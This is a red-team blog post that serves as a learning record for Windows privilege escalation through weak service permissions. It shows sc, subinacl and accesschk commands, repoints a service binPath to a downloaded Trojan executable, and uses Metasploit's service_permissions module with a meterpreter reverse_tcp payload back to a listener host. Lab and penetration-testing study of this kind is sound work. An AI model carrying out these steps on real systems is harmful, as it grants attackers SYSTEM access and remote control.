Weak Service Permission Windows Privilege Promotion

Redteam Windows Privilege Promotion LPE
Learning record
Publish Date:   2021-11-07
Update Date:   2021-11-07
Word Count:   397
Read Times:   2 Min
Read Count:  

Some of the words

The official introduction
https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications

The system or user account must be connected to services to run properly. The following built-in system accounts are usually used for operating services:
LocalService
NetworkService
LocalSystem

When a service has createservice installed, the SCM creates a security descriptor for the service object, and the default security descriptor for the service object grants the following permissions

image-20211107191958116

Actual use

Focus on two types of insecure configuration points:

1.Insecure profile permissions: Users with low permissions can update service Settings, such as executables when the service is running

2.Insecure service executables: Low-privileged users can run their own programs by overwriting the executables of related service runtimes

Insecure profile permissions(PTOC)

Create a new service as follows
sc create 3attack binPath="C:\Users\Public\Documents\data\1.exe"

image-20211107192753754

Assign permissions to users using subinACL progress

subinacl.exe /service 3attack  /grant=y=PTOC

image-20211107193040378

sc

A common user obtains system rights and tries to query service information

image-20211107193539512

View the target service 3attack information. The service account type is Localsystem and has permission to start and stop

image-20211107193634940

accesschk64

Look for SERVICE ALL ACCESS or SERVICE CHANGE CONFIG permissions, which allow an attacker to CHANGE service-related configurations

image-20211107194521311

Using the details

Download Trojan files

image-20211107194919724

Modify the service configuration and start the service
sc config 3attack binPath= "C:\Users\y\13340.exe"
sc start 13340

image-20211107195022083

The permissions are as follows

image-20211107195057181

Insecure service executables(PTO)

Using the details

Directly modify the executable program executed by the service, remotely download our Trojan file and rename it the executable program name in the service

image-20211107200325197

image-20211107200346789

Start the service and go online as follows

image-20211107200428741

MSF direct utilization

use exploit/windows/local/service_permissions

msf6 exploit(windows/local/service_permissions) > options

Module options (exploit/windows/local/service_permissions):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
   SESSION     5                yes       The session to run this module on.
   TIMEOUT     10               yes       Timeout for WMI command in seconds


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.122.1    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

image-20211107200824231

image-20211107200837971.png

Author: Yangsir
Link: https://yangsirrr.github.io/2021/11/07/weak-service-permission-windows-privilege-promotion/
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !
Redteam Windows Privilege Promotion LPE
  TOC